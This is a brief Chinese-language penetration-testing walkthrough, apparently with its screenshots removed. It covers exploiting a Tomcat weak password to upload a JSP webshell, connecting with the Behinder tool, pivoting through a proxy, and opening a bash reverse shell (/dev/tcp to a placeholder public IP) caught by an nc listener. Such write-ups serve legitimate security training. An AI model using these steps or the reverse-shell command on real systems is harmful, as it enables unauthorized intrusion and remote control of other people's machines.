查看扫描结果:
发现tomcat 的ip为192.168.20.1:8080
这里使用冰蝎简单代理给他代理出来:
成功代理到本地的8080端口:
注意这种方式不稳定不怕麻烦使用frp代理
上传webshell:这里是tomcat弱密码漏洞
上传jsp木马:
直接用冰蝎连接:
查看网卡:
网卡中有30网段:测试是否出网
目标可以出网进行反弹shell(因为这里的冰蝎隧道不稳定):
这里使用nc做监听:
bash -i >& /dev/tcp/公网ip/端口 0>&1
这里使用bash编译命令